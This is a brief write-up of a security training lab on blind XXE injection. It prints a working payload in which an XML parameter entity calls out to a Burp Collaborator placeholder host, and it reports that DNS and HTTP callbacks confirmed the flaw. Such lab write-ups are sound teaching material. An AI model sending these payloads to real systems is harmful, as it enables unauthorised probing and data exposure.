We tried the same Blind XXE attack we attempted on Lab - Blind XXE with out-of-band interaction via XML parameter entities, but received the following response:
We used the following payload to perform out-of-band interaction via XML parameter entities:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
%xxe;
]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>We inserted the Burp Collaborator payload and sent the request, but received the response as an XML error, as shown below:
After polling the collaborator, we were able to see the DNS and HTTP requests, confirming the vulnerability.
And we successfully solved the lab.
